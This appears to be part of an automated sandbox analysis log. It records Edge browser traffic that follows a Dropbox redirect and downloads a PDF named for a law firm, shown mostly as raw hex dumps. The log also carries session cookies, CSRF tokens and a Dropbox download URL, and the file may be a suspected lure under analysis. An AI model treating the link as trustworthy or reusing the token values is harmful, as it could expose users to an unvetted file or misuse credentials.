                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:36 UTC4094INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www [TRUNCATED]
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      Location: https://uc7569213660364555d096b4af3d.dl.dropboxusercontent.com/cd/0/get/CgBrJd1x-qTfcYXPFE412Lis9q-HoFjumzxgzf722Qj69a3uFoFqnlbsZRkn8vQ_nLbyvaG5NlGdxNb0UjoSKS71nM_-VEJfe_G56No2MUYUk95bQqHXVH1-Bg1JW2zoiYuYNgDINgW4MUaIg2fzF5vd/file?dl=1#
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                      Set-Cookie: gvc=MTA5MzM4MDA3MzkyMzU3ODcxMTEwNjAwNTMxNTUyMDk2ODUyNjQy; Path=/; Expires=Sun, 09 Dec 2029 17:41:35 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: t=6_NZmsUbzZe-fFybnbPl8mz3; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:41:35 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: __Host-js_csrf=6_NZmsUbzZe-fFybnbPl8mz3; Path=/; Expires=Wed, 10 Dec 2025 17:41:35 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: __Host-ss=O6E_V9mK28; Path=/; Expires=Wed, 10 Dec 2025 17:41:35 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                                      Set-Cookie: locale=en_GB; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:41:35 GMT
                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Content-Length: 17
                                                                                                                                                                                                                                                                                                      Date: Tue, 10 Dec 2024 17:41:35 GMT
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                      Server: envoy
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                      X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                      X-Dropbox-Request-Id: 48bf4276073d450ba99a2258d35ed8ca
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:36 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      6192.168.2.749762172.64.41.34436700C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:37 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      Date: Tue, 10 Dec 2024 17:41:38 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                      CF-RAY: 8eff06e15d480cba-EWR
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 05 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom c)


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      7192.168.2.749763162.159.61.34436700C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:37 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      Date: Tue, 10 Dec 2024 17:41:38 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                      CF-RAY: 8eff06e1583e7298-EWR
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2c 00 04 8e fa 51 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom,Q)


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      8192.168.2.749761162.125.65.154436700C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:37 UTC888OUTGET /cd/0/get/CgBrJd1x-qTfcYXPFE412Lis9q-HoFjumzxgzf722Qj69a3uFoFqnlbsZRkn8vQ_nLbyvaG5NlGdxNb0UjoSKS71nM_-VEJfe_G56No2MUYUk95bQqHXVH1-Bg1JW2zoiYuYNgDINgW4MUaIg2fzF5vd/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: uc7569213660364555d096b4af3d.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC668INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="Lewis Silkin LLP.pdf"; filename*=UTF-8''Lewis%20Silkin%20LLP.pdf
                                                                                                                                                                                                                                                                                                      Etag: 1733686441286063d
                                                                                                                                                                                                                                                                                                      Pragma: public
                                                                                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                      X-Server-Response-Time: 140
                                                                                                                                                                                                                                                                                                      Date: Tue, 10 Dec 2024 17:41:37 GMT
                                                                                                                                                                                                                                                                                                      Server: envoy
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                      Content-Length: 106848
                                                                                                                                                                                                                                                                                                      X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                      X-Dropbox-Request-Id: 06c8a0693f01488b8f948b5c6a8d7f80
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC15716INData Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 32 35 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 38 35 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 38 36 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 32 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 32 30 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20
                                                                                                                                                                                                                                                                                                      Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>endobj2 0 obj<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>endobj3 0 obj<</Type/Page/Parent
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC16384INData Raw: 45 18 32 c4 60 66 ce 30 54 e4 7e 84 fe 55 d0 7c 1f d4 fe d7 e1 27 b3 63 96 b3 9d 95 46 7f 85 be 61 fa 96 ad 4f 89 9a 48 d5 bc 1d 38 05 44 90 3a ca ac c7 00 73 82 49 f4 c1 27 f0 ae 3f e1 8d 9d f6 87 ae 5f a9 86 69 74 f9 63 da 24 44 24 31 07 28 c3 d8 a9 3c d6 56 71 af 7e 8c f4 95 48 57 ca 7d 9b 7e f4 1e 9f d7 a3 3d 83 b5 79 07 c5 7b 59 34 bf 13 68 de 23 81 4e 63 c0 72 3d 51 83 0f cc 13 f9 57 af a9 dc a0 e0 8c 8e 86 b8 af 8a 5a 57 f6 8f 82 ae 24 45 06 5b 47 59 d7 3e 83 83 fa 12 7f 0a da ba bd 36 79 b9 65 55 4f 15 1b ec f4 7f 3d 0e c6 da 74 b9 b6 8e 78 ce 63 91 43 a9 f5 04 64 54 b5 c9 fc 38 d5 46 ab e0 9b 17 e0 3c 00 db b2 8e db 38 03 fe f9 db 5d 65 5c 65 cd 14 ce 5a f4 dd 2a 92 a6 fa 3b 05 14 51 54 64 14 51 45 00 14 76 aa 5a ad c4 f6 9a 55 d5 c5 b2 07 9a 28
                                                                                                                                                                                                                                                                                                      Data Ascii: E2`f0T~U|'cFaOH8D:sI'?_itc$D$1(<Vq~HW}~=y{Y4h#Ncr=QWZW$E[GY>6yeUO=txcCdT8F<8]e\eZ*;QTdQEvZU(
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC668INData Raw: 14 67 8c 12 4e 96 75 65 7a 7a 49 71 f1 f0 59 4d bd bf 63 83 af ca f1 16 8f 1d 3e e8 96 de d7 e5 4d 7f 3a f4 19 da 18 37 c9 58 78 ad 31 71 1d 03 17 8d 32 c9 ae c6 ca ae 86 4c cf 98 5e 33 bd 6f 52 62 65 2f 1f d3 89 b8 d4 d4 0c a3 ec a2 37 26 36 d6 b8 42 74 98 6b ef 97 73 ef 24 fa 30 d5 52 d9 5c f1 1e 95 4c 91 fd 60 ab d1 05 6b 37 79 75 d2 fd 8c 17 e0 7c d2 85 ee 6e 1f 95 3a 32 37 77 ac e6 e2 e0 ef b8 e1 55 be eb d6 88 57 b5 bd 93 f8 3a f5 16 4a a2 6a cd 2b e7 b6 84 07 13 f8 f7 62 6f 4c e0 31 77 1a 13 e8 4e 96 84 1b 53 8c 71 77 5c 66 8d 8e e9 3a fa d5 5e 26 5d 98 7f f2 ac c7 63 f1 c8 19 75 72 38 6e 62 6c be b5 9b 25 c1 1e 73 48 86 2e 39 7b 50 36 2f b4 50 51 b2 4e c7 93 fb a5 0e e4 7c dd 1d cd 5b ee 61 05 a7 bf b3 7d aa 23 63 d2 d5 bd 2d ae c9 0b 6f 65 9d bf
                                                                                                                                                                                                                                                                                                      Data Ascii: gNuezzIqYMc>M:7Xx1q2L^3oRbe/7&6Btks$0R\L`k7yu|n:27wUW:Jj+boL1wNSqw\f:^&]cur8nbl%sH.9{P6/PQN|[a}#c-oe
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:38 UTC16384INData Raw: 51 18 94 6c 67 a6 be 6f af d1 66 af 6e e5 a2 55 46 bd de e4 4a ec 37 bc b8 7a 54 d9 a2 cd bd 7b 72 32 37 d7 24 99 8d fd 8c c5 23 86 57 b5 d5 2f ea 92 e3 73 2b f6 d0 16 bc 11 4c 34 56 f3 bb 3f 96 83 49 78 8d de e2 42 a3 b7 a4 b0 de c8 76 18 f7 19 b9 71 43 ac dc 13 2c a7 57 61 d1 48 df b0 6b 07 49 a7 b9 22 43 74 e1 5e 47 79 5e 6d 8b 7b 52 a3 c3 f2 bc 72 57 9b 14 7e 5f 3c a6 2e 26 0b 65 d1 ef 64 4b c1 06 83 3d c4 74 41 55 4d 96 cc 6c ce 08 b1 78 6f a2 31 83 b2 bd d9 dc 9b ed cf de 99 7d 3c 5b c9 4e 90 e2 b8 7a bc fc d6 d3 66 bc d4 54 4a 77 1d 64 03 19 de 11 91 58 61 51 cf 5f 75 7a ca c9 be e9 5b 7e a5 77 32 cb 72 66 65 66 71 1d 67 82 71 9d de d5 df 3a c0 3a d0 2a 74 49 d9 f1 2e 53 76 5a 7a 6a 3a d7 39 94 84 46 b2 e9 32 1a 59 bf 38 a4 52 62 91 ca 62 f6 46 66
                                                                                                                                                                                                                                                                                                      Data Ascii: QlgofnUFJ7zT{r27$#W/s+L4V?IxBvqC,WaHkI"Ct^Gy^m{RrW~_<.&edK=tAUMlxo1}<[NzfTJwdXaQ_uz[~w2rfefqgq::*tI.SvZzj:9F2Y8RbbFf
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:39 UTC16051INData Raw: f7 8f f9 69 ff f7 e9 5f 52 2c 56 ca d5 54 17 fe c8 c2 72 fe b5 68 6d 6b ab 7d f5 0f 98 02 f6 af 11 5c 56 a9 d5 4c 41 8f ca 05 b4 ab 70 a0 70 b0 c0 14 7c e0 cf 0b 12 a8 52 a1 5c cd 31 63 03 68 00 ae cd 8a b5 1c 37 7e 32 21 bb 49 e3 77 84 b7 1a 00 92 c5 62 c5 0a 38 a0 46 d3 28 4d 64 b7 29 50 3a 90 46 6b d2 c3 e9 c9 f4 c9 b4 29 6d 83 3d d3 f3 bc 32 6e fc bb ee 04 43 93 be 41 d9 5a d8 aa 6f 3d 84 ef b9 79 2b 1c 1a 12 a5 d2 56 db 81 fb 97 a1 65 84 f1 5a 56 54 bc c8 ee 1d f6 fe 1c 3b 97 fa dc 7f e8 0e 92 e3 22 01 10 f1 92 df e8 ad d3 df d7 5d 0f d6 50 ad 58 60 fa 19 ba 9f 41 14 23 c3 82 74 f8 56 fa c3 25 52 e3 b3 32 f0 f5 00 df a1 f1 14 5c 23 73 f5 96 ad cf a0 1b a9 18 b2 1c d9 0f c3 43 c6 e4 a2 d1 e9 d1 19 d2 98 d6 46 4f cb da c8 fb 64 43 33 26 0e 8f c8 a7 31
                                                                                                                                                                                                                                                                                                      Data Ascii: i_R,VTrhmk}\VLApp|R\1ch7~2!Iwb8F(Md)P:Fk)m=2nCAZo=y+VeZVT;"]PX`A#tV%R2\#sCFOdC3&1
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:39 UTC16384INData Raw: e1 b5 ea de 42 08 04 7a 67 ba ae 81 f1 8f 46 9d 7a d6 e5 5a 88 2b 51 d1 55 6d 06 74 86 50 bd 0c be b2 f5 d3 db ba 43 c6 fc e0 b0 c3 96 ab 74 a5 7c c1 44 82 e2 ba 46 b7 f6 1f b6 d6 fc fa 68 b6 98 f2 71 c9 72 29 63 61 a3 4e f7 ca 58 6d ba e2 a5 ab 9f b8 9e cb 59 45 8f dc 9f c0 a3 b9 c1 94 53 f0 cb 3d 3d 15 47 f7 78 c6 ad d1 10 16 36 52 1a c9 c8 23 39 bf d6 ea 30 69 71 07 8c 30 8c 6c b2 2f 9b 1b 91 7d 56 0d 41 5c fa 9a 4e 27 d5 46 05 66 7c 65 05 c7 91 ae 5f 71 f9 97 1a 1c e2 b0 81 1d 6a 0a 1b 64 50 71 8c 38 f0 bd 32 a8 37 1a 58 20 18 04 21 18 b4 f7 2d 2e 9e d2 67 3b 03 29 ca ac 4a 81 54 30 00 e0 d7 6d 94 72 8d c6 ba 2a a8 e6 20 9c be e3 96 a2 68 7d 96 46 01 a2 07 d1 0b 12 8e 2e c0 78 b1 bd fa 09 8c 1a 91 d9 9e 43 0b db 42 f4 00 21 43 2c 18 62 27 af 41 9d d5
                                                                                                                                                                                                                                                                                                      Data Ascii: BzgFzZ+QUmtPCt|DFhqr)caNXmYES==Gx6R#90iq0l/}VA\N'Ff|e_qjdPq827X !-.g;)JT0mr* h}F.xCB!C,b'A
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:39 UTC16384INData Raw: 37 38 20 32 37 38 20 35 30 30 20 32 37 38 20 37 37 38 20 35 30 30 20 35 30 30 20 35 30 30 20 35 30 30 20 33 33 33 20 33 38 39 20 32 37 38 20 35 30 30 20 35 30 30 20 37 32 32 20 30 20 35 30 30 20 34 34 34 5d 20 0d 0a 65 6e 64 6f 62 6a 0d 0a 38 32 20 30 20 6f 62 6a 0d 0a 5b 20 32 37 38 5d 20 0d 0a 65 6e 64 6f 62 6a 0d 0a 38 33 20 30 20 6f 62 6a 0d 0a 5b 20 32 32 36 5d 20 0d 0a 65 6e 64 6f 62 6a 0d 0a 38 34 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 4c 65 6e 67 74 68 20 31 39 32 37 32 2f 4c 65 6e 67 74 68 31 20 38 33 31 36 34 3e 3e 0d 0a 73 74 72 65 61 6d 0d 0a 78 9c ec 7d 07 5c 94 57 ba fe 39 df 37 8d 29 cc 0c 32 b4 01 66 c6 01 44 47 c0 82 0a 6a 64 94 62 ef 8e 01 6c 20 a0 68 50 51 b1 c4 a8 21 31 d1 84 68 7a af
                                                                                                                                                                                                                                                                                                      Data Ascii: 78 278 500 278 778 500 500 500 500 333 389 278 500 500 722 0 500 444] endobj82 0 obj[ 278] endobj83 0 obj[ 226] endobj84 0 obj<</Filter/FlateDecode/Length 19272/Length1 83164>>streamx}\W97)2fDGjdbl hPQ!1hz
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:39 UTC333INData Raw: 8f 7a de eb d6 a4 d9 f8 86 ad 07 5c 0e 19 17 3a ce a7 9e c3 45 aa e3 8c 9c 01 92 ca 0b 51 73 4b 0a bb fe e2 52 94 df 79 c1 cd 64 37 f7 a4 46 6d 67 ce f7 c8 0a 74 f6 6e e7 3a e4 8b 36 a7 12 0e f4 df f8 ac 53 54 f2 d6 9b 15 3f da 50 9d 7c 2e 4e f3 3d 15 d2 ab 73 d7 6e e2 d2 c6 8e a2 fd 69 0b f6 78 f5 ed c1 5b 38 b0 e0 ac eb b9 2b fb 66 4c 12 0e 6b 36 28 7c 8d e5 c0 3b 3f 1c be d1 74 de ac bc 43 e2 62 17 39 59 ec 42 c3 e6 9f 84 b0 fd 9b d3 f5 27 b7 fa 26 27 88 92 a2 f5 28 ed b0 81 6c c5 17 db 9a 1e 51 40 92 ea 9a 8d d8 9e 34 ed 75 21 fd ab 07 0a c4 9e 02 c2 c3 c7 71 7d 66 d0 16 72 7a 70 e0 86 79 7d e8 d1 e5 95 ef 0a 37 7e cb cf 1b 3a c1 a3 61 d1 37 43 96 90 e1 26 c3 6d c5 6d c8 a0 92 ba 85 4e 1f 3e f2 5e dc b0 d0 dd f0 4b bb fc 0f e6 74 ad 15 48 50 cc e5 ac
                                                                                                                                                                                                                                                                                                      Data Ascii: z\:EQsKRyd7Fmgtn:6ST?P|.N=snix[8+fLk6(|;?tCb9YB'&'(lQ@4u!q}frzpy}7~:a7C&mmN>^KtHP
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:39 UTC8544INData Raw: 1d 4b 08 48 1c 19 42 6c 58 e3 d4 c8 32 a0 b4 fc cb 65 7b 3a 6f eb eb 54 26 bf d8 7a eb 67 67 eb 34 2d 5b e9 5b 35 62 d4 8d 76 e5 bd a2 12 5a f7 fd ce 67 e4 cf 6f 3b 6f 38 32 89 27 5c b4 6a e6 2f 61 da 81 7d 3c 9e 76 d9 ea d5 e2 cd e0 fc 4b d1 1b 84 e1 75 ee 26 8c 9f a0 71 1e b3 fe cc 45 e5 5a e1 05 c1 98 b0 77 b7 d3 56 ae 39 b7 78 a2 f5 51 ff e3 d7 fc 44 1d 16 0e b2 4f 7c b3 f3 85 de f9 4b f1 b9 21 5d 0f 2e 90 5d 59 39 e4 a8 5b 16 e7 89 a7 62 77 95 6d d9 88 3e 5b 4f da 46 ba f6 9b 32 ee 6a b6 57 72 ee b1 79 0d 1b f4 ef f7 8d ac cc e1 d9 77 69 97 0e ec 55 e7 df bc b8 2d db e3 f9 e2 62 a7 c7 64 b1 d3 23 a3 79 f9 7c ae b8 d8 e9 1a b4 5d ae 71 36 75 3a 06 4d 87 79 5c fe 87 67 d3 62 6e aa a5 8d c1 9d 8e 70 3c 2d e6 86 83 6d bb 42 47 47 88 67 96 f4 a8 0c 6b 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: KHBlX2e{:oT&zgg4-[[5bvZgo;o82'\j/a}<vKu&qEZwV9xQDO|K!].]Y9[bwm>[OF2jWrywiU-bd#y|]q6u:My\gbnp<-mBGGgk>


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      9192.168.2.749764172.64.41.34436700C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:37 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
